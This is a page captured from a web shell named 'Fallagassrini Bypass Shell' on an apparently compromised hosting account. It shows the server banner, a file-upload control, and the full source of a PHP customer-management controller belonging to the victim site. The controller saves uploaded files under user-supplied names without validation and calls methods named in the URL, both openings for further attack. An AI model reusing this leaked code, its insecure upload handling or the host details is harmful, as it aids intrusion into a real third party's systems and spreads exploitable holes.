? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sgms/application/controllers/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sgms/application/controllers/customer.php

<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');


class Customer extends MY_Controller
{
    function  __construct()
    {
            parent::__construct();
            $this->load->library('Fpaginate');
            $this->load->model('mastermodel');
            $this->load->model('accountingmodel');
            $this->load->model('customermodel');
    }
    
    function get_post_values()
    {
        $data = array();
        foreach ($_POST as $key => $value)
        {
            if($key != "submit")
            {
                $data[$key] =  $this->input->post($key);
            }
        }
        return $data;
    }

    function addformdisplay($page,$directory,$table="",$pagenum="")
    {
        $perm=$this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['sgms_userid'],1);
        if(!$perm)
        {    $data['msg']="Permission Denied";
             $this->load->view('message',$data);
        }
        else
        {
            $this->load->view(''.$directory.'/'.$page.'');
        }
    }

    function deletedata($table,$id,$field)
    {
        $data=array();
        $perm=$this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['sgms_userid'],3);
        if(!$perm)
        {    $data['msg']="Permission Denied";
             $this->load->view('message',$data);
        }
        else
        {
            $data=$this->mastermodel->deletedata($table,$id,$field);
            $data['msg']=$data['msg'];
            if($data['res']==1)
            {
                $this->load->view('message',$data);
            }
            else
            {
                $this->load->view('message',$data);
            }
        }
    }
    
    function checkexistence($table,$field,$value)
    {
        if($this->mastermodel->checkexistence($table,$field,$value)>0)
        {
            echo 1;
        }
    }

    function checkexistencearray($table,$field,$value)
    {
      if($this->mastermodel->checkexistencearray($table,$field,$value)>0)
        {
            echo 1;
        }
    }

    function addincustomer($modelfunction,$page)
    {
        $postdata=$this->get_post_values();
        $data=$this->customermodel->$modelfunction($postdata);
        $data['msg']=$data['msg'];
        if($data['res']==1)
        {
            $this->viewincustomersearch($data['resfunction'],$page,$_SESSION['pagenum']);
            $this->load->view('message',$data);
        }
        else
        {   $this->viewincustomersearch($data['resfunction'],$page,$_SESSION['pagenum']);
            $this->load->view('message',$data);
        }
    }

    function viewincustomersearch($modelfunction,$page,$pagenum)
    {
       /*<---------------- For pagination purpose------------>*/
        $perpage= $this->config->item('perpage');
        $_SESSION['pagenum']=$pagenum;
        $data['pagenum']=$pagenum;
        if($pagenum==1)
        {
            $data['id']=1;
        }
        else
        {
            $data['id']= (($pagenum-1)*$perpage)+1;

        }

        if(isset($_POST['tab_name']))
        {
            $postdata ="";
        }
        else
        {
            $postdata=$this->get_post_values();
        }

        if(!empty ($postdata))
            $_SESSION['searchdata']=$postdata;
        else if(!isset($_SESSION['searchdata']))
             $_SESSION['searchdata']="";
      
        /*<---------------- For pagination purpose------------>         */
        
        
        $output=$this->customermodel->$modelfunction($pagenum);
        $data['startpage']=$output['startpage'];
        $data['endpage']=$output['endpage'];
        $data['viewinfo']=$output['results'];
        $this->load->view('Customer/'.$page.'',$data);
    }


    function edit_page($id,$table,$field,$page)
    {
        if($_SESSION['current_mode']!="")
        {
            $perm=$this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['sgms_userid'],2);
        }
        else
        {
            $perm=1;
        }
        if(!$perm)
        {
             $data['msg']="Permission Denied";
             $this->load->view('message',$data);
        }
        else
        {
             $data['viewinfo']=$this->mastermodel->get_data_srow($table,$id,$field);
             $data['id']=$id;
             $this->load->view('Customer/'.$page,$data);
        }
    }

    function edit_customer($id,$table,$field,$page)
    {
        if($_SESSION['current_mode']!="")
        {
            $perm=$this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['sgms_userid'],2);
        }
        else
        {
            $perm=1;
        }
        if(!$perm)
        {
             $data['msg']="Permission Denied";
             $this->load->view('message',$data);
        }
        else
        {
             $data['customer']=$this->mastermodel->get_data_srow('customer',$id,'customer_id');
             $data['customer_corporate']=$this->mastermodel->get_data_srow('customer_corporate',$id,'customer_id');
             $data['customer_corporate_contacts']=$this->mastermodel->get_data('customer_corporate_contacts',$id,'customer_id');
             $data['customer_personal']=$this->mastermodel->get_data_srow('customer_personal',$id,'customer_id');
             $data['customer_reference']=$this->mastermodel->get_data_srow('employeecustomer',$id,'customer_id');
             
             $data['id']=$id;
             $this->load->view('Customer/'.$page,$data);
        }
    }

    function single_customer($id,$table,$field,$page)
    {
        if($_SESSION['current_mode']!="")
        {
            $perm=$this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['sgms_userid'],0);
        }
        else
        {
            $perm=1;
        }
        if(!$perm)
        {
             $data['msg']="Permission Denied";
             $this->load->view('message',$data);
        }
        else
        {
             $data['customer']=$this->mastermodel->get_data_srow('customer',$id,'customer_id');
             $data['customer_corporate']=$this->mastermodel->get_data_srow('customer_corporate',$id,'customer_id');
             $data['customer_corporate_contacts']=$this->mastermodel->get_data('customer_corporate_contacts',$id,'customer_id');
             $data['customer_personal']=$this->mastermodel->get_data_srow('customer_personal',$id,'customer_id');
             $data['customer_reference']=$this->mastermodel->get_data_srow('employeecustomer',$id,'customer_id');

             $data['id']=$id;
             $this->load->view('Customer/'.$page,$data);
        }
    }
    

    function get_customer_no($customer_type)
    {
        echo $this->customermodel->get_customer_no($customer_type);
    }

    function uploadform($customer_id)
    {
        $data=array();
        $data['customer_id']=$customer_id;
        $this->load->view('Customer/uploadform',$data);
    }

    function submitupload()
    {
        $data=array();
        $postdata=$this->get_post_values();
        $path = './assets/uploads/';
        $_FILES["upload_file"]["name"]=date('Y-m-d-h-i-s').$_FILES["upload_file"]["name"];
        if (!is_file("$path".$_FILES["upload_file"]["name"]))
        {
            if (!(move_uploaded_file($_FILES["upload_file"]["tmp_name"],$path."/".$_FILES["upload_file"]["name"])))
            {
                    $data['msg']= "File not uploaded.. Permission denied!";
            }
            else
            {
                    $postdata['file_location']=$path."/".$_FILES["upload_file"]["name"];
                    $data=$this->mastermodel->uploadfile($postdata);
                    $data['msg']=  "File Uploaded successfully!";

            }
        }
        else
        {
            $data['msg']=  "File already exists";
        }
        $this->load->view('Customer/afterupload',$data);
    }
        
        function trackcustomer()
        {
            $this->load->view('Customer/track_customer');
        }
        
        function search_track_customer()
        {
            $data['proposal'] = $this->customermodel->track_training_proposal();
            $data['quotation'] = $this->customermodel->track_training_quotation();
            $data['registration'] = $this->customermodel->track_training_registration();
            $data['software'] = $this->customermodel->track_software_proposal();
            $data['placement'] = $this->customermodel->track_software_placement();
            $this->load->view('Customer/view_track_customer',$data);
        }

}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net